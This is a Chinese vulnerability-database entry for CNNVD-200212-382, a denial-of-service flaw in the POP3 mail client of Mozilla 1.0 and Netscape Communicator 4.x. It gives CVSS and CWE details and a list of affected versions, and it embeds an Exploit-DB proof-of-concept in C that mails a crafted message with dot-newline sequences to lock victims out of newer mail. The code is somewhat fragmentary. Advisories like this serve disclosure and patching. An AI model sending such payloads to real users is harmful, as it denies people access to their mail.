发布时间 :2002-12-31 00:00:00
修订时间 :2008-09-05 16:32:57

[原文]The POP3 mail client in Mozilla 1.0 and earlier, and Netscape Communicator 4.7 and earlier, allows remote attackers to cause a denial of service (no new mail) via a mail message containing a dot (.) at a newline, which is interpreted as the end of the message.

[CNNVD]Netscape / Mozilla畸形邮件POP3拒绝服务漏洞(CNNVD-200212-382)

        Mozilla 1.0及其更早版本,和Netscape Communicator 4.7及其更早版本的POP3邮件客户端存在漏洞。远程攻击者可以借助换行符中也可以看做是信息结尾,包含一个.(点)的邮件信息导致服务拒绝(无新邮件)。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-20 [输入验证不恰当]

- CPE (受影响的平台与产品)

cpe:/a:netscape:communicator:4.76Netscape Communicator 4.76
cpe:/a:mozilla:mozilla:0.9.2Mozilla Mozilla Browser 0.9.2
cpe:/a:netscape:navigator:6.2Netscape Netscape 6.2
cpe:/a:mozilla:mozilla:1.0Mozilla Mozilla 1.0
cpe:/a:netscape:communicator:4.75Netscape Communicator 4.75
cpe:/a:netscape:communicator:4.08Netscape Communicator 4.08
cpe:/a:mozilla:mozilla:0.9.5Mozilla Mozilla Browser 0.9.5
cpe:/a:netscape:communicator:4.5Netscape Communicator 4.5
cpe:/a:mozilla:mozilla:0.9.7Mozilla Mozilla 0.9.7
cpe:/a:mozilla:mozilla:0.9.3Mozilla Mozilla Browser 0.9.3
cpe:/a:netscape:communicator:4.4Netscape Communicator 4.4
cpe:/a:netscape:communicator:4.74Netscape Communicator 4.74
cpe:/a:mozilla:mozilla: Mozilla Browser
cpe:/a:mozilla:mozilla:0.9.6Mozilla Mozilla Browser 0.9.6
cpe:/a:netscape:navigator:6.1Netscape Netscape 6.1
cpe:/a:netscape:communicator:4.72Netscape Communicator 4.72
cpe:/a:netscape:communicator:4.51Netscape Communicator 4.51
cpe:/a:netscape:communicator:4.61Netscape Communicator 4.61
cpe:/a:mozilla:mozilla:0.9.4Mozilla Mozilla Browser 0.9.4
cpe:/a:mozilla:mozilla: Mozilla Browser
cpe:/a:netscape:navigator:6.2.2Netscape Netscape 6.2.2
cpe:/a:netscape:communicator:4.6Netscape Communicator 4.6
cpe:/a:netscape:communicator:4.77Netscape Communicator 4.77
cpe:/a:mozilla:mozilla:0.9.8Mozilla Mozilla Browser 0.9.8
cpe:/a:mozilla:mozilla:0.9.9Mozilla Mozilla 0.9.9
cpe:/a:netscape:communicator:4.73Netscape Communicator 4.73
cpe:/a:netscape:communicator:4.07Netscape Communicator 4.07
cpe:/a:netscape:navigator:6.2.1Netscape Netscape 6.2.1
cpe:/a:netscape:navigator:6.01Netscape Netscape 6.01
cpe:/a:netscape:communicator:4.06Netscape Communicator 4.06
cpe:/a:netscape:navigator:6.0Netscape Netscape 6.0
cpe:/a:netscape:communicator:4.0Netscape Communicator 4.0
cpe:/a:netscape:communicator:4.7Netscape Communicator 4.7

- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(PATCH)  BID  5002
(UNKNOWN)  XF  mozilla-netscape-pop3-dos(9343)

- 漏洞信息

Netscape / Mozilla畸形邮件POP3拒绝服务漏洞
中危 其他
2002-12-31 00:00:00 2002-12-31 00:00:00
        Mozilla 1.0及其更早版本,和Netscape Communicator 4.7及其更早版本的POP3邮件客户端存在漏洞。远程攻击者可以借助换行符中也可以看做是信息结尾,包含一个.(点)的邮件信息导致服务拒绝(无新邮件)。

- 公告与补丁

        Reportedly this issue is resolved in Mozilla 1.1. Alpha versions may be accessed at the following location:

- 漏洞信息 (21539)

Netscape 4.x/6.x,Mozilla 0.9.x Malformed Email POP3 Denial Of Service Vulnerability (EDBID:21539)
multiple dos
2002-06-12 Verified
0 eldre8
N/A [点击下载]

The Netscape Communicator and Mozilla browsers include support for email, and the ability to fetch mail through a POP3 server. Both products are available for a range of platforms, including Microsoft Windows and Linux.

Under some circumstances, malformed email messages may prevent Netscape and Mozilla clients from accessing POP3 mailboxes. In particular, users will be unable to access more recent messages or delete the malicious email. 

/* this is the code that comes with my
 * advisory #1 to illustrate this...
 * eldre8 at afturgurluk (double dot minus one) org


#define MX "localhost"
#define EHLO "EHLO mx\r\n"
#define MAIL "MAIL FROM: root@localhost\r\n"
#define RCPT "RCPT TO: root@localhost\r\n"
#define DATA "DATA\r\n"
#define QUIT "QUIT\r\n"

#define PORT 25

int sock;
char buffer[255];

void SigCatch() {
    fprintf(stderr, "\b\bbye!\n");

int main() {
    /* I was too lame to implement the command line... :) */
    int i;
    struct sockaddr_in sout;
    struct hostent *hp;

    signal(SIGINT, SigCatch);

    sock=socket(AF_INET, SOCK_STREAM, 0);
    if (sock<0) {
        return -1;

    memcpy(&(sout.sin_addr), *(hp->h_addr_list), sizeof(struct in_addr));
    if (connect(sock, &sout, sizeof(sout))<0) {
        return -1;
    recv(sock, buffer, 255, 0); /* receive the banner... */
    send(sock, EHLO, sizeof(EHLO), 0);
    recv(sock, buffer, 255, 0); /* receive the welcome message... */
    send(sock, MAIL, sizeof(MAIL), 0);
    recv(sock, buffer, 255, 0); /* receive the acknowledgement to mail from. */
    send(sock, RCPT, sizeof(RCPT), 0);
    recv(sock, buffer, 255, 0); /* idem, but for the rcpt to... */
    send(sock, DATA, sizeof(DATA), 0);
    recv(sock, buffer, 255, 0);
    i=sprintf(buffer, "b4d maIl 1n 4KT1oN!\n\x0a\x0d\x2e\x0d\x20\x0a\x0a\nblabla...\x0a\x20");
    sprintf(buffer+i+1, "\n.\n");
    send(sock, buffer, i+1+3, 0); /* send the dumb thing ... */
    recv(sock, buffer, 255, 0);
    send(sock, QUIT, sizeof(QUIT), 0);
    recv(sock, buffer, 255, 0);

    return 0;


- 漏洞信息

Netscape POP3 Client Malformed Message Newline Handling Remote DoS
Remote / Network Access, Context Dependent Denial of Service, Input Manipulation
Loss of Availability Upgrade
Exploit Public Vendor Verified

- 漏洞描述

- 时间线

2002-06-12 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 4.78 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete